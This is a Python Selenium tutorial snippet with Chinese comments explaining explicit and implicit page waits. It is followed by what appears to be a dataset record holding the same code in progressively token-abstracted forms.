# WebDriverWait 库,负责循环等待
from selenium.webdriver.support.ui import WebDriverWait
# expected_conditions 类,负责条件出发
from selenium.webdriver.support import expected_conditions as EC
driver = webdriver.Chrome()
driver.get("http://www.xxxxx.com/loading")
try:
# 页面一直循环,直到 id="myDynamicElement" 出现
element = WebDriverWait(driver, 10).until(
EC.presence_of_element_located((By.ID, "myDynamicElement"))
)
finally:
driver.quit()
# 如果不写参数,程序默认会 0.5s 调用一次来查看元素是否已经生成,如果本来元素就是存在的,那么会立即返回。
# 下面是一些内置的等待条件,你可以直接调用这些条件,而不用自己写某些等待条件了。
# title_is
# title_contains
# presence_of_element_located
# visibility_of_element_located
# visibility_of
# presence_of_all_elements_located
# text_to_be_present_in_element
# text_to_be_present_in_element_value
# frame_to_be_available_and_switch_to_it
# invisibility_of_element_located
# element_to_be_clickable – it is Displayed and Enabled.
# staleness_of
# element_to_be_selected
# element_located_to_be_selected
# element_selection_state_to_be
# element_located_selection_state_to_be
# alert_is_present
# 2. 隐式等待
# 隐式等待比较简单,就是简单地设置一个等待时间,单位为秒。当然如果不设置,默认等待时间为0。
from selenium import webdriver
driver = webdriver.Chrome()
driver.implicitly_wait(10) # seconds
driver.get("http://www.xxxxx.com/loading")
myDynamicElement = driver.find_element_by_id("myDynamicElement") | [
"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# 页面等待\n\n# 注意:这是非常重要的一部分!!\n#\n# 现在的网页越来越多采用了 Ajax 技术,这样程序便不能确定何时某个元素完全加载出来了。如果实际页面等待时间过长导致某个dom元素还没出来,但是你的代码直接使用了这个WebElement,那么就会抛出NullPointer的异常。\n#\n# 为了避免这种元素定位困难而且会提高产生 ElementNotVisibleException 的概率。所以 Selenium 提供了两种等待方式,一种是隐式等待,一种是显式等待。\n#\n# 隐式等待是等待特定的时间,显式等待是指定某一条件直到这个条件成立时继续执行。\n\n# 显式等待\n# 1.显式等待指定某个条件,然后设置最长等待时间。如果在这个时间还没有找到元素,那么便会抛出异常了。\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\n# WebDriverWait 库,负责循环等待\nfrom selenium.webdriver.support.ui import WebDriverWait\n# expected_conditions 类,负责条件出发\nfrom selenium.webdriver.support import expected_conditions as EC\n\ndriver = webdriver.Chrome()\ndriver.get(\"http://www.xxxxx.com/loading\")\ntry:\n # 页面一直循环,直到 id=\"myDynamicElement\" 出现\n element = WebDriverWait(driver, 10).until(\n EC.presence_of_element_located((By.ID, \"myDynamicElement\"))\n )\nfinally:\n driver.quit()\n\n# 如果不写参数,程序默认会 0.5s 调用一次来查看元素是否已经生成,如果本来元素就是存在的,那么会立即返回。\n# 下面是一些内置的等待条件,你可以直接调用这些条件,而不用自己写某些等待条件了。\n# title_is\n# title_contains\n# presence_of_element_located\n# visibility_of_element_located\n# visibility_of\n# presence_of_all_elements_located\n# text_to_be_present_in_element\n# text_to_be_present_in_element_value\n# frame_to_be_available_and_switch_to_it\n# invisibility_of_element_located\n# element_to_be_clickable – it is Displayed and Enabled.\n# staleness_of\n# element_to_be_selected\n# element_located_to_be_selected\n# element_selection_state_to_be\n# element_located_selection_state_to_be\n# alert_is_present\n\n# 2. 隐式等待\n# 隐式等待比较简单,就是简单地设置一个等待时间,单位为秒。当然如果不设置,默认等待时间为0。\nfrom selenium import webdriver\n\ndriver = webdriver.Chrome()\ndriver.implicitly_wait(10) # seconds\ndriver.get(\"http://www.xxxxx.com/loading\")\nmyDynamicElement = driver.find_element_by_id(\"myDynamicElement\")",
"from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\ndriver = webdriver.Chrome()\ndriver.get('http://www.xxxxx.com/loading')\ntry:\n element = WebDriverWait(driver, 10).until(EC.\n presence_of_element_located((By.ID, 'myDynamicElement')))\nfinally:\n driver.quit()\nfrom selenium import webdriver\ndriver = webdriver.Chrome()\ndriver.implicitly_wait(10)\ndriver.get('http://www.xxxxx.com/loading')\nmyDynamicElement = driver.find_element_by_id('myDynamicElement')\n",
"<import token>\ndriver = webdriver.Chrome()\ndriver.get('http://www.xxxxx.com/loading')\ntry:\n element = WebDriverWait(driver, 10).until(EC.\n presence_of_element_located((By.ID, 'myDynamicElement')))\nfinally:\n driver.quit()\n<import token>\ndriver = webdriver.Chrome()\ndriver.implicitly_wait(10)\ndriver.get('http://www.xxxxx.com/loading')\nmyDynamicElement = driver.find_element_by_id('myDynamicElement')\n",
"<import token>\n<assignment token>\ndriver.get('http://www.xxxxx.com/loading')\ntry:\n element = WebDriverWait(driver, 10).until(EC.\n presence_of_element_located((By.ID, 'myDynamicElement')))\nfinally:\n driver.quit()\n<import token>\n<assignment token>\ndriver.implicitly_wait(10)\ndriver.get('http://www.xxxxx.com/loading')\n<assignment token>\n",
"<import token>\n<assignment token>\n<code token>\n<import token>\n<assignment token>\n<code token>\n<assignment token>\n"
] | false |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.